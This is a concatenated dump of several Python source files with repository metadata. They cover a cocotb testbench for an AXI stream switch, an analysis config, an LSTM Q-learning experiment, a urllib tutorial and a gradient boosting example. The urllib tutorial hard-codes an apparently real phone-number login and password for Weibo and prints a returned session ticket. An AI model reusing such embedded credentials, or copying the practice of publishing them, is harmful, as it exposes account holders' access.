return bytearray(itertools.islice(itertools.cycle(range(256)), length))
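# Illustration (added): cycle_pause() yields the repeating pattern 1, 1, 1, 0,
# i.e. pause on three out of every four cycles, and incrementing_payload(4)
# returns bytearray(b'\x00\x01\x02\x03').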
if cocotb.SIM_NAME:
s_count = len(cocotb.top.axis_switch_inst.s_axis_tvalid)
m_count = len(cocotb.top.axis_switch_inst.m_axis_tvalid)
factory = TestFactory(run_test)
factory.add_option("payload_lengths", [size_list])
factory.add_option("payload_data", [incrementing_payload])
factory.add_option("idle_inserter", [None, cycle_pause])
factory.add_option("backpressure_inserter", [None, cycle_pause])
factory.add_option("s", range(min(s_count, 2)))
factory.add_option("m", range(min(m_count, 2)))
factory.generate_tests()
for test in [run_test_tuser_assert]:
factory = TestFactory(test)
factory.add_option("s", range(min(s_count, 2)))
factory.add_option("m", range(min(m_count, 2)))
factory.generate_tests()
if s_count > 1:
factory = TestFactory(run_arb_test)
factory.generate_tests()
factory = TestFactory(run_stress_test)
factory.add_option("idle_inserter", [None, cycle_pause])
factory.add_option("backpressure_inserter", [None, cycle_pause])
factory.generate_tests()
# cocotb-test
tests_dir = os.path.dirname(__file__)
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
@pytest.mark.parametrize("data_width", [8, 16, 32])
@pytest.mark.parametrize("m_count", [1, 4])
@pytest.mark.parametrize("s_count", [1, 4])
def test_axis_switch(request, s_count, m_count, data_width):
dut = "axis_switch"
wrapper = f"{dut}_wrap_{s_count}x{m_count}"
module = os.path.splitext(os.path.basename(__file__))[0]
toplevel = wrapper
# generate wrapper
wrapper_file = os.path.join(tests_dir, f"{wrapper}.v")
if not os.path.exists(wrapper_file):
subprocess.Popen(
[os.path.join(rtl_dir, f"{dut}_wrap.py"), "-p", f"{s_count}", f"{m_count}"],
cwd=tests_dir
).wait()
verilog_sources = [
wrapper_file,
os.path.join(rtl_dir, f"{dut}.v"),
os.path.join(rtl_dir, "axis_register.v"),
os.path.join(rtl_dir, "arbiter.v"),
os.path.join(rtl_dir, "priority_encoder.v"),
]
parameters = {}
parameters['S_COUNT'] = s_count
parameters['M_COUNT'] = m_count
parameters['DATA_WIDTH'] = data_width
parameters['KEEP_ENABLE'] = int(parameters['DATA_WIDTH'] > 8)
parameters['KEEP_WIDTH'] = parameters['DATA_WIDTH'] // 8
parameters['ID_ENABLE'] = 1
parameters['ID_WIDTH'] = 16
parameters['DEST_WIDTH'] = 8
parameters['USER_ENABLE'] = 1
parameters['USER_WIDTH'] = 1
parameters['S_REG_TYPE'] = 0
parameters['M_REG_TYPE'] = 2
parameters['ARB_TYPE_ROUND_ROBIN'] = 1
parameters['ARB_LSB_HIGH_PRIORITY'] = 1
extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}
sim_build = os.path.join(tests_dir, "sim_build",
request.node.name.replace('[', '-').replace(']', ''))
cocotb_test.simulator.run(
python_search=[tests_dir],
verilog_sources=verilog_sources,
toplevel=toplevel,
module=module,
parameters=parameters,
sim_build=sim_build,
extra_env=extra_env,
)
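    # One way to run a parameterization of this test directly (assuming pytest,
    # cocotb-test and a supported simulator such as Icarus Verilog are
    # installed):
    #
    #     pytest -v test_axis_switch.py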
| [
"[email protected]"
] | |
98f5a7d9ab4b3f578ce6948bda3f56af31438973 | eb42558f56fdb41526cc31ac4ef3a6937bf39e96 | /ConfigDefinitions/UserConfigs/SMHTT_2017_MCOnly_AntiIso_Configs_Deep/WConfig.py | c3c70830e40ca4f509cffad86bf361a53146d0bb | [] | no_license | samhiggie/Jesterworks | 6906b042d3e200efb9bd10b70284ccd30661aa53 | 562e8cbb20d7e4b1d5b9bdba3715578cc66f097d | refs/heads/master | 2020-09-11T19:35:59.770456 | 2019-11-16T12:37:35 | 2019-11-16T12:37:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | from ConfigDefinitions.JesterworksConfigurations import JesterworksConfiguration as Config
from ConfigDefinitions.BranchAdditions.UserDefinedCollections.SMHTT_2017_MC_Data_Collection import MC_Data_Collection as BranchCollection
from ConfigDefinitions.CuttingDefinitions.UserCutConfigs.SMHTT2017Cuts_MC_AntiIso_wDeep import SMHTT2017Cuts as CutConfig
from ConfigDefinitions.EndActionDefinitions.UserConfigs.GrabHistograms import HistogramGrabber as HistogramGrabber
DataConfig = Config()
DataConfig.Path = "/data/ccaillol/smhmt2017_svfitted_12oct/"
DataConfig.Files = ["W.root","W1.root","W2.root","W3.root","W4.root"]
DataConfig.InputTreeName = "mutau_tree"
DataConfig.SampleName = "W"
DataConfig.OutputPath = "/data/aloeliger/SMHTT_Selected_2017_MCOnly_AntiIso_Deep/"
DataConfig.OutputFile = "W.root"
DataConfig.OutputTreeName = 'mt_Selected'
DataConfig.BranchCollection = BranchCollection
DataConfig.CutConfig = CutConfig
DataConfig.EndAction = HistogramGrabber
| [
"[email protected]"
] | |
109a0b28a419817d509d6d4ce27db19a8f90c3ad | 235fcd12177715b51f26715befb7cb1909f27126 | /sleep_control/experiments/arxiv/experiment_QNN_Jan31_2249_LSTM.py | ad1ee787afca6d41b7db4289cd35014ed9d60009 | [] | no_license | xiaogaogaoxiao/dqn4wirelesscontrol | 1d165977f01e263735865e2b6daeed51c4288b01 | 68c2c485e64cef260c0dcb3975a88af4fae97283 | refs/heads/master | 2020-06-16T17:05:45.038089 | 2017-02-10T07:30:12 | 2017-02-10T07:30:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,160 | py | # System built-in modules
import time
from datetime import datetime
import sys
import os
from multiprocessing import Pool
project_dir = "../../"
log_file_name = "msg_QNN_Jan31_2249_LSTM_{}.log".format(sys.argv[1])
sys.path.append(project_dir)
sys_stdout = sys.stdout
# Project dependency modules
import pandas as pd
pd.set_option('mode.chained_assignment', None) # block warnings due to DataFrame value assignment
import lasagne
# Project modules
from sleep_control.traffic_emulator import TrafficEmulator
from sleep_control.traffic_server import TrafficServer
from sleep_control.controller import QController, DummyController, NController
from sleep_control.integration import Emulation
from sleep_control.env_models import SJTUModel
from rl.qtable import QAgent
from rl.qnn_theano import QAgentNN
from rl.mixin import PhiMixin, DynaMixin
# Composite classes
class Phi_QAgentNN(PhiMixin, QAgentNN):
def __init__(self, **kwargs):
super(Phi_QAgentNN, self).__init__(**kwargs)
class Dyna_QAgent(DynaMixin, QAgent):
def __init__(self, **kwargs):
super(Dyna_QAgent, self).__init__(**kwargs)
class Dyna_QAgentNN(DynaMixin, QAgentNN):
def __init__(self, **kwargs):
super(Dyna_QAgentNN, self).__init__(**kwargs)
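# Note (added comment): these composite classes rely on cooperative multiple
# inheritance -- e.g. Phi_QAgentNN's MRO visits PhiMixin before QAgentNN, so
# PhiMixin can stack the last `phi_length` observations into the state before
# delegating to the neural-network agent via super(). Likewise, DynaMixin wraps
# model-based simulated backups around the base agent's updates. This
# description assumes the mixins call super() cooperatively, as their use here
# suggests.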
# load from processed data
session_df =pd.read_csv(
filepath_or_buffer=project_dir+'/sleep_control/data/net_traffic_processed_dh3.dat',
parse_dates=['startTime_datetime', 'endTime_datetime', 'interArrivalDuration_datetime']
)
# Parameters
# |- Agent
# |- QAgent
actions = [(True, None), (False, 'serve_all')]
gamma, alpha = 0.9, 0.9 # TD backup
explore_strategy, epsilon = 'epsilon', 0.02 # exploration
# |- QAgentNN
# | - Phi
phi_length = 15
dim_state = (1, phi_length, 3+2)
range_state_slice = [(0, 10), (0, 10), (0, 10), (0, 1), (0, 1)]
range_state = [[range_state_slice]*phi_length]
# | - No Phi
# phi_length = 0
# dim_state = (1, 1, 3)
# range_state = ((((0, 10), (0, 10), (0, 10)),),)
def f_build_net(input_var=None, input_shape=None, num_outputs=None):
if input_shape is None or num_outputs is None:
raise ValueError('State or Action dimension not given!')
l_in = lasagne.layers.InputLayer(shape=input_shape, input_var=input_var)
d1, d2, d3, d4 = input_shape
l_shp1 = lasagne.layers.ReshapeLayer(l_in, (-1, d3, d4))
l_lstm = lasagne.layers.LSTMLayer(l_shp1, num_units=500, grad_clipping=10, only_return_final=True, precompute_input=True)
l_shp2 = lasagne.layers.ReshapeLayer(l_lstm, (-1, 500))
l_out = lasagne.layers.DenseLayer(
l_shp2, num_units=num_outputs,
nonlinearity=lasagne.nonlinearities.tanh)
return l_out
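# Shape walk-through for f_build_net (added comment), assuming input_shape is
# (batch, 1, phi_length, n_features) = (batch, 1, 15, 5): the first reshape
# folds it to (batch, 15, 5); the LSTM (500 units, only_return_final=True)
# emits the final hidden state of shape (batch, 500); and the dense tanh layer
# maps that to (batch, num_outputs), one output per action.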
# | - Other params
momentum, learning_rate = 0.9, 0.01 # SGD
num_buffer, memory_size, batch_size, update_period, freeze_period = 2, 200, 100, 4, 16
reward_scaling, reward_scaling_update, rs_period = 1, 'adaptive', 32 # reward scaling
# |- Env model
model_type, traffic_window_size = 'IPP', 50
stride, n_iter, adjust_offset = 2, 3, 1e-22
eval_period, eval_len = 4, 100
n_belief_bins, max_queue_len = 100, 20
Rs, Rw, Rf, Co, Cw = 1.0, -1.0, -10.0, -5.0, -0.5
traffic_params = (model_type, traffic_window_size,
stride, n_iter, adjust_offset,
eval_period, eval_len,
n_belief_bins)
queue_params = (max_queue_len,)
beta = 0.5 # R = (1-beta)*ServiceReward + beta*Cost
reward_params = (Rs, Rw, Rf, Co, Cw, beta)
# |- DynaQ
num_sim = 5
# |- Env
# |- Time
start_time = pd.to_datetime("2014-10-15 09:40:00")
total_time = pd.Timedelta(days=7)
time_step = pd.Timedelta(seconds=2)
backoff_epochs = num_buffer*memory_size+phi_length
head_datetime = start_time - time_step*backoff_epochs
tail_datetime = head_datetime + total_time
TOTAL_EPOCHS = int(total_time/time_step)
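# Worked example (added): with total_time = 7 days and time_step = 2 s,
# TOTAL_EPOCHS = 7*24*3600/2 = 302400 decision epochs.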
# |- Reward
rewarding = {'serve': Rs, 'wait': Rw, 'fail': Rf}
te = TrafficEmulator(
session_df=session_df, time_step=time_step,
head_datetime=head_datetime, tail_datetime=tail_datetime,
rewarding=rewarding,
verbose=2)
ts = TrafficServer(cost=(Co, Cw), verbose=2)
env_model = SJTUModel(traffic_params, queue_params, reward_params, 2)
# agent = Dyna_QAgentNN(
# env_model=env_model, num_sim=num_sim,
agent = Phi_QAgentNN(
phi_length=phi_length,
dim_state=dim_state, range_state=range_state,
f_build_net = f_build_net,
batch_size=batch_size, learning_rate=learning_rate, momentum=momentum,
reward_scaling=reward_scaling, reward_scaling_update=reward_scaling_update, rs_period=rs_period,
update_period=update_period, freeze_period=freeze_period,
memory_size=memory_size, num_buffer=num_buffer,
# Below is QAgent params
actions=actions, alpha=alpha, gamma=gamma,
explore_strategy=explore_strategy, epsilon=epsilon,
verbose=2)
c = QController(agent=agent)
emu = Emulation(te=te, ts=ts, c=c, beta=beta)
# Heavy lifting
t = time.time()
sys.stdout = sys_stdout
log_path = project_dir + '/sleep_control/experiments/log/'
if os.path.isfile(log_path+log_file_name):
print "Log file {} already exist. Experiment cancelled.".format(log_file_name)
else:
log_file = open(log_path+log_file_name,"w")
print log_file_name + datetime.now().strftime(' [%Y-%m-%d %H:%M:%S] ') + '00%'
time.sleep(1)
sys.stdout = log_file
while emu.epoch is not None and emu.epoch<TOTAL_EPOCHS:
# log time
print "Epoch {},".format(emu.epoch),
left = emu.te.head_datetime + emu.te.epoch*emu.te.time_step
right = left + emu.te.time_step
print "{} - {}".format(left.strftime("%Y-%m-%d %H:%M:%S"), right.strftime("%Y-%m-%d %H:%M:%S"))
emu.step()
print
if emu.epoch%(0.1*TOTAL_EPOCHS)==0:
sys.stdout = sys_stdout
print log_file_name,
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S] ')+'{}0%'.format(10*emu.epoch/TOTAL_EPOCHS)
time.sleep(1)
sys.stdout = log_file
sys.stdout = sys_stdout
log_file.close()
print log_file_name,
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'),
print '{:.3f} sec,'.format(time.time()-t),
print '{:.3f} min'.format((time.time()-t)/60)
| [
"[email protected]"
] | |
8ff0c8e47e574a3a1e3a5c08bcb4cd992a48c23a | 7fbf91c595f3adb67e29ab879a0b215581d260bf | /知识点/04-LiaoXueFeng-master/55-urllib.py | f613e42c3282f9ecbfdeb46685e8f672b48fb8c8 | [] | no_license | Randyedu/python | 69947b3836e62d0081d92591ae2acd9a54eadb9a | 5f9e7bec295ae05eadde0f661e7039c2bd08f725 | refs/heads/master | 2021-04-26T22:20:22.555128 | 2018-03-02T07:01:27 | 2018-03-02T07:01:27 | 124,074,741 | 1 | 0 | null | 2018-03-06T12:23:42 | 2018-03-06T12:23:42 | null | UTF-8 | Python | false | false | 4,701 | py | '''
urllib
urllib provides a set of functions for working with URLs.
What urllib offers is the ability to perform all kinds of HTTP requests from a program. If you want to mimic a browser to accomplish a specific task, the request has to be disguised as one sent by a browser. The way to do that is to first capture the requests a real browser sends, then forge the request headers to match them; the User-Agent header is the one that identifies the browser.
'''
'''
Get
urllib's request module makes it very convenient to fetch the content of a URL: it sends a GET request to the specified page and returns the HTTP response:
'''
'''
# Fetch a web page and print the response:
from urllib import request
url = 'https://api.douban.com/v2/book/2129650'
with request.urlopen(url) as f:
data = f.read()
print('Status:', f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print(data.decode('utf-8'))
'''
print('----Simulate a browser sending a GET request----')
'''
If we want to simulate a browser sending a GET request, we need to use a Request object.
By adding HTTP headers to the Request object, we can disguise the request as coming from a browser.
For example, simulate an iPhone 6 requesting the Douban home page:
'''
from urllib import request
'''
url = 'http://www.douban.com/'
req = request.Request(url)
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
print('status:',f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print(f.read().decode('utf-8'))
'''
print('----Send a request with POST----')
'''
Post
To send a request with POST, just pass the parameter data in as bytes.
'''
# We simulate a Weibo login: first read the login email and password, then submit them encoded as username=xxx&password=xxx, the format used by weibo.cn's login page:
from urllib import request,parse
print('Login to weibo.cn...')
email = '18767162147'
passwd = '123456'
login_data = parse.urlencode([
('username',email),
('password',passwd),
('entry','mweibo'),
('client_id',''),
('savestate','1'),
('ec',''),
('pagerefer','https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F')
])
req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F')
with request.urlopen(req, data=login_data.encode('utf-8')) as f:
print('Status:',f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print('Data:',f.read().decode('utf-8'))
'''
Login to weibo.cn...
Status: 200 OK
Server:nginx/1.2.0
Date:Wed, 18 Nov 2015 01:17:48 GMT
Content-Type:text/html
Transfer-Encoding:chunked
Connection:close
Vary:Accept-Encoding
Cache-Control:no-cache, must-revalidate
Expires:Sat, 26 Jul 1997 05:00:00 GMT
Pragma:no-cache
Access-Control-Allow-Origin:https://passport.weibo.cn
Access-Control-Allow-Credentials:true
DPOOL_HEADER:dryad45
SINA-LB:aGEuOTAuZzEucXhnLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:ZGNjYTk0Y2UgMCAwIDAgNCA0ODAK
Login succeeded:
Data: {"retcode":20000000,"msg":"","data":{"loginresulturl":"https:\/\/passport.weibo.com\/sso\/crossdomain?entry=mweibo&action=login&proj=1&ticket=ST-MTk1NTAzMjcxNw%3D%3D-1447809422-gz-2C1D9275A244AFBEC6C3994B7615CBE0&display=0&cdurl=https%3A%2F%2Flogin.sina.com.cn%2Fsso%2Fcrossdomain%3Fentry%3Dmweibo%26action%3Dlogin%26proj%3D1%26ticket%3DST-MTk1NTAzMjcxNw%253D%253D-1447809422-gz-FE1989D8F7BC5227D9D27A1379670EF5%26display%3D0%26cdurl%3Dhttps%253A%252F%252Fpassport.sina.cn%252Fsso%252Fcrossdomain%253Fentry%253Dmweibo%2526action%253Dlogin%2526display%253D0%2526ticket%253DST-MTk1NTAzMjcxNw%25253D%25253D-1447809422-gz-057CDD10C8F2E7EB8E9797ADB86B4477","uid":"1955032717"}}
Login failed:
Data: {"retcode":50011002,"msg":"\u7528\u6237\u540d\u6216\u5bc6\u7801\u9519\u8bef","data":{"im":1,"username":"18767162147","errline":604}}
'''
'''
Handler
If even more complex control is needed, for example accessing a website through a Proxy (proxy server), we need a ProxyHandler to handle it.
'''
import urllib.request
proxy_handler = urllib.request.ProxyHandler({'http':'http://www.example.com:3128/'})
proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
proxy_auth_handler.add_password('realm','host','username','password')
opener = urllib.request.build_opener(proxy_handler,proxy_auth_handler)
with opener.open('http://www.example.com/login.html') as f:
pass
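# Note (an addition to the original tutorial): instead of keeping a local
# opener object, it can be installed globally so that urllib.request.urlopen()
# routes through the proxy automatically:
#
#     urllib.request.install_opener(opener)
#     with urllib.request.urlopen('http://www.example.com/login.html') as f:
#         pass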
| [
"[email protected]"
] | |
09ea107626a3b50a80e9b2624651b464bff260df | 162e0e4791188bd44f6ce5225ff3b1f0b1aa0b0d | /examples/ensemble/plot_gradient_boosting_regularization.py | 30116b2be102df536f491dab433fc757a2c46506 | [] | no_license | testsleeekGithub/trex | 2af21fa95f9372f153dbe91941a93937480f4e2f | 9d27a9b44d814ede3996a37365d63814214260ae | refs/heads/master | 2020-08-01T11:47:43.926750 | 2019-11-06T06:47:19 | 2019-11-06T06:47:19 | 210,987,245 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,842 | py | """
================================
Gradient Boosting regularization
================================
Illustration of the effect of different regularization strategies
for Gradient Boosting. The example is taken from Hastie et al 2009 [1]_.
The loss function used is binomial deviance. Regularization via
shrinkage (``learning_rate < 1.0``) improves performance considerably.
In combination with shrinkage, stochastic gradient boosting
(``subsample < 1.0``) can produce more accurate models by reducing the
variance via bagging.
Subsampling without shrinkage usually does poorly.
Another strategy to reduce the variance is by subsampling the features
analogous to the random splits in Random Forests
(via the ``max_features`` parameter).
.. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical
Learning Ed. 2", Springer, 2009.
"""
print(__doc__)
# Author: Peter Prettenhofer <[email protected]>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from mrex import ensemble
from mrex import datasets
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
X = X.astype(np.float32)
# map labels from {-1, 1} to {0, 1}
labels, y = np.unique(y, return_inverse=True)
X_train, X_test = X[:2000], X[2000:]
y_train, y_test = y[:2000], y[2000:]
original_params = {'n_estimators': 1000, 'max_leaf_nodes': 4, 'max_depth': None, 'random_state': 2,
'min_samples_split': 5}
plt.figure()
for label, color, setting in [('No shrinkage', 'orange',
{'learning_rate': 1.0, 'subsample': 1.0}),
('learning_rate=0.1', 'turquoise',
{'learning_rate': 0.1, 'subsample': 1.0}),
('subsample=0.5', 'blue',
{'learning_rate': 1.0, 'subsample': 0.5}),
('learning_rate=0.1, subsample=0.5', 'gray',
{'learning_rate': 0.1, 'subsample': 0.5}),
('learning_rate=0.1, max_features=2', 'magenta',
{'learning_rate': 0.1, 'max_features': 2})]:
params = dict(original_params)
params.update(setting)
clf = ensemble.GradientBoostingClassifier(**params)
clf.fit(X_train, y_train)
# compute test set deviance
test_deviance = np.zeros((params['n_estimators'],), dtype=np.float64)
for i, y_pred in enumerate(clf.staged_decision_function(X_test)):
# clf.loss_ assumes that y_test[i] in {0, 1}
test_deviance[i] = clf.loss_(y_test, y_pred)
plt.plot((np.arange(test_deviance.shape[0]) + 1)[::5], test_deviance[::5],
'-', color=color, label=label)
plt.legend(loc='upper left')
plt.xlabel('Boosting Iterations')
plt.ylabel('Test Set Deviance')
plt.show()
| [
"[email protected]"
] | |
2c1206ff3140a312e6079a06ddf7380a15553501 | 009c1088e42cd50591946f736c30c0bad6db851b | /netmiko/ssh_exception.py | ad9e728ba282388faa4e5286d0a8f5df8748ee36 | [
"MIT"
] | permissive | hellt/netmiko | 812501b0651db920ac07e09132651eee7bdd4794 | f7ff5e6278acaecff7583518cc97bd945fceddc3 | refs/heads/master | 2021-01-18T12:45:01.751466 | 2016-11-18T23:30:44 | 2016-11-18T23:30:44 | 38,681,423 | 2 | 0 | null | 2015-07-07T10:44:21 | 2015-07-07T10:44:20 | Python | UTF-8 | Python | false | false | 380 | py | from paramiko.ssh_exception import SSHException
from paramiko.ssh_exception import AuthenticationException
class NetMikoTimeoutException(SSHException):
"""SSH session timed trying to connect to the device."""
pass
class NetMikoAuthenticationException(AuthenticationException):
"""SSH authentication exception based on Paramiko AuthenticationException."""
pass
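# Usage sketch (an addition): netmiko's ConnectHandler raises these exceptions
# when a connection times out or authentication fails; the device parameters
# below are hypothetical.
#
#     from netmiko import ConnectHandler
#     try:
#         conn = ConnectHandler(device_type='cisco_ios', ip='192.0.2.1',
#                               username='admin', password='secret')
#     except NetMikoTimeoutException:
#         print('Connection to the device timed out.')
#     except NetMikoAuthenticationException:
#         print('Authentication to the device failed.')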
| [
"[email protected]"
] |